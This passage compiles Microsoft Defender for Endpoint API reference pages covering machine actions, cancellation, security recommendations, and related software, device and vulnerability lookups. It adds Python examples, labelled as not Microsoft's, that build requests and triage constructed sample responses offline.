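    "eu": "api-eu.securitycenter.microsoft.com",
    "uk": "api-uk.securitycenter.microsoft.com",
    "au": "api-au.securitycenter.microsoft.com",
}

# action key -> (URL segment, extra body fields with allowed values, permission).
# An allowed-values entry of None means the field is required but free-form.
ACTIONS = {
    "isolate": ("isolate", {"IsolationType": {"Full", "Selective"}}, "Machine.Isolate"),
    "unisolate": ("unisolate", {}, "Machine.Isolate"),
    "restrict": ("restrictCodeExecution", {}, "Machine.RestrictExecution"),
    "unrestrict": ("unrestrictCodeExecution", {}, "Machine.RestrictExecution"),
    "scan": ("runAntiVirusScan", {"ScanType": {"Quick", "Full"}}, "Machine.Scan"),
    "offboard": ("offboard", {}, "Machine.Offboard"),
    "quarantine": ("StopAndQuarantineFile", {"Sha1": None}, "Machine.StopAndQuarantine"),
}

# Machine ids are the 40-character values seen in the device URL (hex in the examples).
MACHINE_ID_RE = re.compile(r"^[0-9a-fA-F]{40}$")
SHA1_RE = re.compile(r"^[0-9a-fA-F]{40}$")
EXAMPLE_MACHINE_ID = "1e5bc9d7e413ddd7902c2932e418702b84d0cc07"  # the page's example id


@dataclass
class MachineActionRequest:
    method: str
    url: str
    headers: dict
    body: str         # JSON text, ready to send
    permission: str   # permission the bearer token must carry for this action


def build_machine_action(action, machine_id, token, comment, region="", **params):
    """Return the POST for one machine action, or raise ValueError for a body the
    API would reject (missing Comment, bad IsolationType/ScanType/Sha1)."""
    if action not in ACTIONS:
        raise ValueError(f"unknown action {action!r}; choose from {sorted(ACTIONS)}")
    if region not in REGIONAL_HOSTS:
        raise ValueError(f"unknown region {region!r}")
    segment, required, permission = ACTIONS[action]
    if not MACHINE_ID_RE.match(machine_id or ""):
        raise ValueError("machine id must be the 40-character id from the device URL")
    if not comment or not comment.strip():
        raise ValueError("Comment is required for every machine action")
    body = {"Comment": comment}
    for name, allowed in required.items():
        value = params.pop(name, None)
        if value is None:
            raise ValueError(f"{action} requires {name}")
        if allowed is not None and value not in allowed:
            raise ValueError(f"{name} must be one of {sorted(allowed)}, got {value!r}")
        if name == "Sha1" and not SHA1_RE.match(value):
            raise ValueError("Sha1 must be 40 hex characters")
        body[name] = value
    if params:
        raise ValueError(f"unexpected parameters for {action}: {sorted(params)}")
    return MachineActionRequest(
        method="POST",
        url=f"https://{REGIONAL_HOSTS[region]}/api/machines/{machine_id}/{segment}",
        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
        body=json.dumps(body),
        permission=permission,
    )


def validation_error(action, machine_id, token, comment, region="", **params):
    """Return the ValueError message a request would raise, or None when valid."""
    try:
        build_machine_action(action, machine_id, token, comment, region, **params)
    except ValueError as exc:
        return str(exc)
    return None


def classify_response(status, body_text=""):
    """Map an HTTP reply to (outcome, machine_action_id_or_None).

    201 (or 200, which the offboard article documents) -> "created" with the
    MachineAction id; 400 containing "Action is already in progress" ->
    "already_pending" (the earlier action is still running: poll it rather than
    retrying); other 400 -> "rejected"; 404 -> "not_found"; 429 -> "throttled".
    """
    if status in (200, 201):
        try:
            payload = json.loads(body_text) if body_text else {}
        except json.JSONDecodeError:
            payload = {}
        return "created", payload.get("id") if isinstance(payload, dict) else None
    if status == 400:
        if "Action is already in progress" in (body_text or ""):
            return "already_pending", None
        return "rejected", None
    if status == 404:
        return "not_found", None
    if status == 429:
        return "throttled", None
    return "error", None
```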


Cancel machine action API
Article • 09/27/2023

Applies to:

- Microsoft Defender for Endpoint
- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

API description
Cancel an already launched machine action that isn't yet in a final state (completed,
canceled, failed).

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Get started.

Permission type                     Permission                 Permission display name
Application                         Machine.CollectForensics   Collect forensics
                                    Machine.Isolate            Isolate machine
                                    Machine.RestrictExecution  Restrict code execution
                                    Machine.Scan               Scan machine
                                    Machine.Offboard           Offboard machine
                                    Machine.StopAndQuarantine  Stop And Quarantine
                                    Machine.LiveResponse       Run live response on a specific machine
Delegated (work or school account)  Machine.CollectForensics   Collect forensics
                                    Machine.Isolate            Isolate machine
                                    Machine.RestrictExecution  Restrict code execution
                                    Machine.Scan               Scan machine
                                    Machine.Offboard           Offboard machine
                                    Machine.StopAndQuarantine  Stop And Quarantine
                                    Machine.LiveResponse       Run live response on a specific machine

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machineactions/<machineactionid>/cancel

Request headers

Name           Type    Description
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body

Parameter  Type    Description
Comment    String  Comment to associate with the cancellation action.

Response
If successful, this method returns a 200 OK response code with a Machine Action entity. If
a machine action entity with the specified ID wasn't found, it returns 404 Not Found.

Example

Request
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-4b28-ab65-54970c5d5018/cancel

JSON

{
  "Comment": "Machine action was canceled by automation"
}
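
Because the cancel API only accepts actions that haven't reached a final state, automation should check the status of each MachineAction entity before issuing the call. The following is an added example (not Microsoft's code) that filters a batch of entities down to the cancellable ones, builds the cancel request for each, and interprets the 200/404 reply; the entities are constructed, and "InProgress" as a non-final status and the two-l spelling "cancelled" are this example's own assumptions.

```python
"""Select cancellable machine actions and build the cancel requests.

Added example, not Microsoft's code. Final states (completed, canceled,
failed) and the endpoint come from the article; the sample entities are
constructed.
"""
import json
import re

# Both spellings of "canceled" are accepted defensively (assumption, not from the page).
FINAL_STATES = {"completed", "canceled", "cancelled", "failed"}
# Machine action ids are GUIDs, e.g. 988cc94e-7a8f-4b28-ab65-54970c5d5018 on the page.
GUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)


def is_cancellable(machine_action):
    """True while the action has not reached a final state (e.g. Pending)."""
    return str(machine_action.get("status", "")).lower() not in FINAL_STATES


def build_cancel_request(machine_action_id, token, comment):
    """Return the POST for /api/machineactions/{id}/cancel as a plain dict."""
    if not GUID_RE.match(machine_action_id or ""):
        raise ValueError("machine action id must be a GUID")
    return {
        "method": "POST",
        "url": f"https://api.securitycenter.microsoft.com/api/machineactions/{machine_action_id}/cancel",
        "headers": {"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
        "body": json.dumps({"Comment": comment}),
    }


def plan_cancellations(machine_actions, token, comment):
    """Return (requests, skipped): one request per cancellable action and a
    list of (id, status) for actions already final, which the API won't cancel."""
    requests, skipped = [], []
    for action in machine_actions:
        if is_cancellable(action):
            requests.append(build_cancel_request(action["id"], token, comment))
        else:
            skipped.append((action["id"], action.get("status")))
    return requests, skipped


def interpret_cancel_response(status):
    """200 -> "canceled" (the Machine Action entity is in the body); 404 -> "not_found"."""
    return {200: "canceled", 404: "not_found"}.get(status, "error")


# Constructed sample entities; the first id is the one used in the page's example.
SAMPLE_ACTIONS = [
    {"id": "988cc94e-7a8f-4b28-ab65-54970c5d5018", "type": "Isolate", "status": "Pending"},
    {"id": "11111111-2222-4333-8444-555555555555", "type": "RunAntiVirusScan", "status": "Completed"},
    {"id": "aaaaaaaa-bbbb-4ccc-8ddd-eeeeeeeeeeee", "type": "LiveResponse", "status": "Failed"},
]

if __name__ == "__main__":
    requests, skipped = plan_cancellations(SAMPLE_ACTIONS, "<token>", "Machine action was canceled by automation")
    print(f"{len(requests)} request(s) to send, {len(skipped)} already final: {skipped}")
```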

Related article
Get machine action API


Recommendation resource type
Article • 02/22/2024

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

- api-us.securitycenter.microsoft.com
- api-eu.securitycenter.microsoft.com
- api-uk.securitycenter.microsoft.com
- api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Methods

Method                              Return Type                Description
List all recommendations            Recommendation collection  Retrieves a list of all security
                                                               recommendations affecting the organization
Get recommendation by ID            Recommendation             Retrieves a security recommendation by its
                                                               ID
Get recommendation software         Software                   Retrieves a security recommendation related
                                                               to a specific software
Get recommendation devices          MachineRef collection      Retrieves a list of devices associated with the
                                                               security recommendation
Get recommendation vulnerabilities  Vulnerability collection   Retrieves a list of vulnerabilities associated
                                                               with the security recommendation

Properties

Property                       Type               Description
id                             String             Recommendation ID
productName                    String             Related software name
recommendationName             String             Recommendation name
Weaknesses                     Long               Number of discovered vulnerabilities
Vendor                         String             Related vendor name
recommendedVersion             String             Recommended version
recommendedProgram             String             Recommended program
recommendedVendor              String             Recommended vendor
recommendationCategory         String             Recommendation category. Possible values are:
                                                  Accounts, Application, Network, OS, SecurityControls
subCategory                    String             Recommendation subcategory
severityScore                  Double             Potential impact of the configuration to the
                                                  organization's Microsoft Secure Score for Devices (1-10)
publicExploit                  Boolean            Public exploit is available
activeAlert                    Boolean            Active alert is associated with this recommendation
associatedThreats              String collection  Threat analytics report is associated with this
                                                  recommendation
remediationType                String             Remediation type. Possible values are:
                                                  ConfigurationChange, Update, Upgrade, Uninstall
Status                         Enum               Recommendation exception status. Possible values
                                                  are: Active and Exception
configScoreImpact              Double             Microsoft Secure Score for Devices impact
exposureImpact                 Double             Exposure score impact
totalMachineCount              Long               Number of installed devices
exposedMachinesCount           Long               Number of installed devices that are exposed to
                                                  vulnerabilities
nonProductivityImpactedAssets  Long               Number of devices that aren't affected
relatedComponent               String             Related software component



List all recommendations
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a list of all security recommendations affecting the organization.

API description
Returns information about all security recommendations affecting the organization.
URL: GET:/api/recommendations
Supports OData V4 queries.
OData supported operators:
$filter on: id, productName, vendor, recommendedVersion, recommendationCategory,
subCategory, severityScore, remediationType, recommendedProgram, recommendedVendor,
and status properties.
$top with max value of 10,000.
$skip.

See examples at OData queries with Microsoft Defender for Endpoint.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | SecurityRecommendation.Read.All | 'Read Threat and Vulnerability Management security recommendation information'
Delegated (work or school account) | SecurityRecommendation.Read | 'Read Threat and Vulnerability Management security recommendation information'

HTTP request
HTTP

GET /api/recommendations

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the list of security recommendations in
the body.

Example

Request
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/recommendations

Response
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Recommendations",
"value": [
{
"id": "va-_-microsoft-_-windows_10",
"productName": "windows_10",
"recommendationName": "Update Windows 10",
"weaknesses": 397,
"vendor": "microsoft",
"recommendedVersion": "",
"recommendationCategory": "Application",
"subCategory": "",
"severityScore": 0,
"publicExploit": true,
"activeAlert": false,
"associatedThreats": [
"3098b8ef-23b1-46b3-aed4-499e1928f9ed",
"40c189d5-0330-4654-a816-e48c2b7f9c4b",
"4b0c9702-9b6c-4ca2-9d02-1556869f56f8",
"e8fc2121-3cf3-4dd2-9ea0-87d7e1d2b29d",
"94b6e94b-0c1d-4817-ac06-c3b8639be3ab"
],
"remediationType": "Update",
"status": "Active",
"configScoreImpact": 0,
"exposureImpact": 7.674418604651163,
"totalMachineCount": 37,
"exposedMachinesCount": 7,
"nonProductivityImpactedAssets": 0,
"relatedComponent": "Windows 10"
}
...
]
}
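The following Python example is added here to show how the $filter, $top and $skip rules above and the Recommendation properties are used together; it is not code from the article or from Microsoft. It builds a request URL for GET /api/recommendations that refuses properties outside the documented $filter set and clamps $top to the documented 10,000 maximum, then parses a response body and orders active recommendations for remediation. The regional hosts, filterable properties and limit are taken from the article; the sample response is constructed from the article's example plus one constructed entry (the `sca-_-example-_-legacy_tls` row), the ranking order is this example's own choice, and no request is sent.

```python
"""Added example (not Microsoft's code): build an OData query for
GET /api/recommendations and triage the parsed response offline."""
import json
from dataclasses import dataclass
from urllib.parse import urlencode

# Regional hosts listed in the article; "global" is the default host.
HOSTS = {
    "global": "api.securitycenter.microsoft.com",
    "us": "api-us.securitycenter.microsoft.com",
    "eu": "api-eu.securitycenter.microsoft.com",
    "uk": "api-uk.securitycenter.microsoft.com",
    "au": "api-au.securitycenter.microsoft.com",
}
# Properties the article lists as valid $filter targets for this endpoint.
FILTERABLE = {"id", "productName", "vendor", "recommendedVersion",
              "recommendationCategory", "subCategory", "severityScore",
              "remediationType", "recommendedProgram", "recommendedVendor",
              "status"}
MAX_TOP = 10_000  # documented maximum for $top


def build_url(region="global", filters=None, top=None, skip=None):
    """Return the request URL. `filters` is a list of (property, op, value)
    tuples joined with 'and'; unsupported properties raise ValueError and
    $top is clamped to the documented limit."""
    params = {}
    if filters:
        clauses = []
        for prop, op, value in filters:
            if prop not in FILTERABLE:
                raise ValueError(f"{prop!r} is not a supported $filter property")
            if isinstance(value, str):          # OData string literal
                value = "'" + value.replace("'", "''") + "'"
            elif isinstance(value, bool):       # OData boolean literal
                value = "true" if value else "false"
            clauses.append(f"{prop} {op} {value}")
        params["$filter"] = " and ".join(clauses)
    if top is not None:
        params["$top"] = min(int(top), MAX_TOP)
    if skip is not None:
        params["$skip"] = int(skip)
    url = f"https://{HOSTS[region]}/api/recommendations"
    return url + ("?" + urlencode(params, safe="$") if params else "")


@dataclass
class Recommendation:
    id: str
    product_name: str
    public_exploit: bool
    active_alert: bool
    exposed: int
    total: int
    exposure_impact: float
    remediation_type: str
    status: str


def parse_recommendations(body):
    """Parse a /api/recommendations response body into Recommendation objects."""
    return [Recommendation(
        id=r["id"], product_name=r["productName"],
        public_exploit=r["publicExploit"], active_alert=r["activeAlert"],
        exposed=r["exposedMachinesCount"], total=r["totalMachineCount"],
        exposure_impact=r["exposureImpact"],
        remediation_type=r["remediationType"], status=r["status"],
    ) for r in json.loads(body)["value"]]


def triage(recs):
    """Order active recommendations for remediation: public exploit first,
    then active alert, then exposure impact, then exposed device count.
    Recommendations with an Exception status are left out. This ordering
    is the example's own choice, not a documented API feature."""
    active = [r for r in recs if r.status == "Active"]
    return sorted(active, reverse=True, key=lambda r: (
        r.public_exploit, r.active_alert, r.exposure_impact, r.exposed))


# Constructed sample body: two rows taken from the articles' examples and
# one constructed row (sca-_-example-_-legacy_tls) with an Exception status.
SAMPLE_RESPONSE = json.dumps({
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Recommendations",
    "value": [
        {"id": "va-_-google-_-chrome", "productName": "chrome", "publicExploit": False,
         "activeAlert": False, "exposedMachinesCount": 5, "totalMachineCount": 6,
         "exposureImpact": 3.9441860465116285, "remediationType": "Update", "status": "Active"},
        {"id": "va-_-microsoft-_-windows_10", "productName": "windows_10", "publicExploit": True,
         "activeAlert": False, "exposedMachinesCount": 7, "totalMachineCount": 37,
         "exposureImpact": 7.674418604651163, "remediationType": "Update", "status": "Active"},
        {"id": "sca-_-example-_-legacy_tls", "productName": "example", "publicExploit": True,
         "activeAlert": True, "exposedMachinesCount": 12, "totalMachineCount": 12,
         "exposureImpact": 1.0, "remediationType": "ConfigurationChange", "status": "Exception"},
    ],
})

if __name__ == "__main__":
    print(build_url("eu", [("remediationType", "eq", "Update")], top=50_000))
    for rec in triage(parse_recommendations(SAMPLE_RESPONSE)):
        print(rec.id, rec.exposed, "/", rec.total, "exposed")
```

Pass the URL to any HTTP client with an `Authorization: Bearer {token}` header; the builder deliberately rejects `publicExploit` and similar properties because the article does not list them as filterable, so filtering on them must be done client-side after the response is parsed.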

See also
Microsoft Defender Vulnerability Management
Vulnerability management security recommendations



Get recommendation by ID
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a security recommendation by its ID.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | SecurityRecommendation.Read.All | 'Read Threat and Vulnerability Management security recommendation information'
Delegated (work or school account) | SecurityRecommendation.Read | 'Read Threat and Vulnerability Management security recommendation information'

HTTP request
HTTP

GET /api/recommendations/{id}

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the security recommendations in the
body.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome

Response example
Here's an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Recommendations/$entity",
"id": "va-_-google-_-chrome",
"productName": "chrome",
"recommendationName": "Update Chrome",
"weaknesses": 38,
"vendor": "google",
"recommendedVersion": "",
"recommendationCategory": "Application",
"subCategory": "",
"severityScore": 0,
"publicExploit": false,
"activeAlert": false,
"associatedThreats": [],
"remediationType": "Update",
"status": "Active",
"configScoreImpact": 0,
"exposureImpact": 3.9441860465116285,
"totalMachineCount": 6,
"exposedMachinesCount": 5,
"nonProductivityImpactedAssets": 0,
"relatedComponent": "Chrome"
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management security recommendation



List software by recommendation
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a security recommendation related to a specific software.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | SecurityRecommendation.Read | 'Read Threat and Vulnerability Management security recommendation information'

HTTP request
HTTP

GET /api/recommendations/{id}/software

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the software associated with the security
recommendations in the body.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome/software

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Analytics.Contracts.PublicAPI.PublicProductDto",
"id": "google-_-chrome",
"name": "chrome",
"vendor": "google",
"weaknesses": 38,
"publicExploit": false,
"activeAlert": false,
"exposedMachines": 5,
"impactScore": 3.94418621
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management security recommendation



List devices by recommendation
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a list of devices associated with the security recommendation.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | SecurityRecommendation.Read.All | 'Read Threat and Vulnerability Management security recommendation information'
Delegated (work or school account) | SecurityRecommendation.Read | 'Read Threat and Vulnerability Management security recommendation information'

HTTP request
HTTP

GET /api/recommendations/{id}/machineReferences

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the list of devices associated with the
security recommendation.

Example

Request example
Here is an example of the request.
HTTP

GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome/machineReferences

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#MachineReferences",
"value": [
{
"id": "e058770379bc199a9c179ce52a23e16fd44fd2ee",
"computerDnsName": "niw_pc",
"osPlatform": "Windows10",
"rbacGroupName": "GroupTwo"
}
...
]
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management security recommendation



List vulnerabilities by recommendation
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a list of vulnerabilities associated with the security recommendation.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management security recommendation information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management security recommendation information'

HTTP request
HTTP

GET /api/recommendations/{id}/vulnerabilities

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, with the list of vulnerabilities associated with
the security recommendation.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/recommendations/va-_-google-_-chrome/vulnerabilities

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(Analytics.Contracts.PublicAPI.PublicVulnerabilityDto)",
"value": [
{
"id": "CVE-2019-13748",
"name": "CVE-2019-13748",
"description": "Insufficient policy enforcement in developer
tools in Google Chrome prior to 79.0.3945.79 allowed a local attacker to
obtain potentially sensitive information from process memory via a crafted
HTML page.",
"severity": "Medium",
"cvssV3": 6.5,
"exposedMachines": 0,
"publishedOn": "2019-12-10T00:00:00Z",
"updatedOn": "2019-12-16T12:15:00Z",
"publicExploit": false,
"exploitVerified": false,
"exploitInKit": false,
"exploitTypes": [],
"exploitUris": []
}
...
]
}
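The three per-recommendation endpoints (software, machineReferences, vulnerabilities) are usually consumed together, so here is an added Python example that walks them for one recommendation ID and folds the responses into a single triage record. This is not code from the article or from Microsoft. The `fetch` function is a stand-in for an authenticated GET against the base URL; its canned responses are constructed from the article's Chrome examples plus one constructed device and one constructed vulnerability row (identified by an obviously placeholder `CVE-0000-00000`), and nothing is sent over the network.

```python
"""Added example (not Microsoft's code): aggregate the software, device and
vulnerability sub-resources of one security recommendation offline."""
from collections import Counter

BASE = "https://api.securitycenter.microsoft.com/api"

# Constructed canned responses keyed by request path. They stand in for the
# live API: the first row in each list is taken from the article's examples,
# the remaining rows are constructed with placeholder identifiers.
CANNED = {
    "/recommendations/va-_-google-_-chrome/software": {
        "id": "google-_-chrome", "name": "chrome", "vendor": "google",
        "weaknesses": 38, "publicExploit": False, "activeAlert": False,
        "exposedMachines": 5, "impactScore": 3.94418621},
    "/recommendations/va-_-google-_-chrome/machineReferences": {"value": [
        {"id": "e058770379bc199a9c179ce52a23e16fd44fd2ee", "computerDnsName": "niw_pc",
         "osPlatform": "Windows10", "rbacGroupName": "GroupTwo"},
        {"id": "0000000000000000000000000000000000000001", "computerDnsName": "constructed-pc",
         "osPlatform": "Windows11", "rbacGroupName": "GroupOne"}]},
    "/recommendations/va-_-google-_-chrome/vulnerabilities": {"value": [
        {"id": "CVE-2019-13748", "severity": "Medium", "cvssV3": 6.5,
         "publicExploit": False, "exploitVerified": False, "exploitInKit": False},
        {"id": "CVE-0000-00000", "severity": "High", "cvssV3": 8.8,       # constructed row
         "publicExploit": True, "exploitVerified": True, "exploitInKit": False}]},
}


def fetch(path, token="PLACEHOLDER_TOKEN"):
    """Stand-in for `GET {BASE}{path}` sent with `Authorization: Bearer {token}`.
    Replace the body with a real HTTP call; the canned lookup keeps this offline.
    An unknown path raises LookupError, mirroring a 404 from the service."""
    if path not in CANNED:
        raise LookupError(f"404 Not Found: {BASE}{path}")
    return CANNED[path]


def recommendation_report(rec_id):
    """Combine the three sub-resource responses for one recommendation ID
    into a single record a remediation owner can act on."""
    software = fetch(f"/recommendations/{rec_id}/software")
    devices = fetch(f"/recommendations/{rec_id}/machineReferences")["value"]
    vulns = fetch(f"/recommendations/{rec_id}/vulnerabilities")["value"]
    # Any of the three exploit flags on a vulnerability raises its urgency.
    exploitable = [v["id"] for v in vulns
                   if v["publicExploit"] or v["exploitVerified"] or v["exploitInKit"]]
    return {
        "recommendation": rec_id,
        "software": f'{software["vendor"]}/{software["name"]}',
        "weaknesses": software["weaknesses"],
        "exposed_devices": len(devices),
        "devices_by_group": dict(Counter(d["rbacGroupName"] for d in devices)),
        "high_cvss": [v["id"] for v in vulns if v["cvssV3"] >= 7.0],
        "exploitable": exploitable,
        "max_cvss": max((v["cvssV3"] for v in vulns), default=0.0),
    }


if __name__ == "__main__":
    for key, value in recommendation_report("va-_-google-_-chrome").items():
        print(f"{key}: {value}")
```

The `devices_by_group` count is grouped on `rbacGroupName` because device groups are how Defender for Endpoint scopes who can remediate; a report split by group can be handed to each group's owner directly.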

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management security recommendation



Remediation activity methods and
properties
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more
about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

The API response contains Microsoft Defender Vulnerability Management remediation
activities that have been created in your tenant.

Methods

Method | Data type | Description
List all remediation activities | Investigation collection | Returns information about all remediation activities.
List exposed devices of one remediation activity | Investigation entity | Returns information about exposed devices for the specified remediation activity.
Get one remediation activity by ID | Investigation entity | Returns information for the specified remediation activity.

Learn more about remediation activities.

Properties

Property ID | Data type | Description
Category | String | Category of the remediation activity (Software/Security configuration)
completerEmail | String | If the remediation activity was manually completed by someone, this column contains their email
completerId | String | If the remediation activity was manually completed by someone, this column contains their object ID
completionMethod | String | A remediation activity can be completed "automatically" (if all the devices are patched) or "manually" by a person who selects "mark as completed."
createdOn | DateTime | Time this remediation activity was created
Description | String | Description of this remediation activity
dueOn | DateTime | Due date the creator set for this remediation activity
fixedDevices | | The number of devices that have been fixed
ID | String | ID of this remediation activity
nameId | String | Related product name
Priority | String | Priority the creator set for this remediation activity (High\Medium\Low)
productId | String | Related product ID
productivityImpactRemediationType | String | A few configuration changes could be requested only for devices that don't affect users. This value indicates the selection between "all exposed devices" or "only devices with no user impact."
rbacGroupNames | String | Related device group names
recommendedProgram | String | Recommended program to upgrade to
recommendedVendor | String | Recommended vendor to upgrade to
recommendedVersion | String | Recommended version to update/upgrade to
relatedComponent | String | Related component of this remediation activity (similar to the related component for a security recommendation)
requesterEmail | String | Creator email address
requesterId | String | Creator object ID
requesterNotes | String | The notes (free text) the creator added for this remediation activity
Scid | String | SCID of the related security recommendation
Status | String | Remediation activity status (Active/Completed)
statusLastModifiedOn | DateTime | Date when the status field was updated
targetDevices | Long | Number of exposed devices that this remediation is applicable to
Title | String | Title of this remediation activity
Type | String | Remediation type
vendorId | String | Related vendor name

See also
Get one remediation activity by ID

List all remediation activities

